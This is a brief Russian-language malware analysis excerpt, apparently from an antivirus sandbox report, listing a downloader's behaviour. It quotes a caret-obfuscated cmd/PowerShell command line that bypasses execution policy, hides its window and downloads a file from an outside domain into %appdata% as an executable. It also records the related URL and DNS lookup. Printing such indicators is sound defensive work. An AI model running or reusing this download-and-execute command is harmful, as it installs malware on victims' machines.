Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POw^erSHEL^l.^ExE -e^xECU^T^iO^nPoLicy B^y^Pa^SS -NoPrOfi^le^ -W^I^nDOWSTYl^E ^hIDdeN (^N^E^W-o^B^jecT syST^eM.n^eT.Webc^l^i^Ent^).d^O^wnLoaDfIL^e('http://sutraponef.top/read....
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "POw^erSHEL^l.^ExE -e^xECU^T^iO^nPoLicy B^y^Pa^SS -NoPrOfi^le^ -W^I^nDOWSTYl^E ^hIDdeN (^N^E^W-o^B^jecT syST^eM.n^eT.Webc^l^i^Ent^).d^O^wnLoaDfIL^e('http://sutraponef.top/read....' (со скрытым окном)